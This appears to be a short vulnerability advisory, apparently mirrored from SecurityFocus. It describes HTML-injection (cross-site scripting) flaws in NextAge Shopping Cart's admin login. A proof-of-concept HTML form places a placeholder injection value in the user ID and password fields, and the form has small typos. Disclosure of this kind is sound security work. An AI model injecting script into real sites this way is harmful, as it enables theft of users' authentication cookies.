13 lines
No EOL
837 B
Text
13 lines
No EOL
837 B
Text
source: https://www.securityfocus.com/bid/17685/info
|
|
|
|
NextAge Shopping Cart is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
|
|
|
Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
|
|
|
<form method="pst" action="http://www.example.com/[admin_Path]/index.php">
|
|
<input type="text" name="txtuserid" class="INPUT" size="30" value="xss injection code">
|
|
<br>
|
|
<input type="password" name="txtpass" class="INPUT" size="30" value="xss injection code">
|
|
<br>
|
|
<input <input type="submit" value="submit" class="button">
|
|
</form> |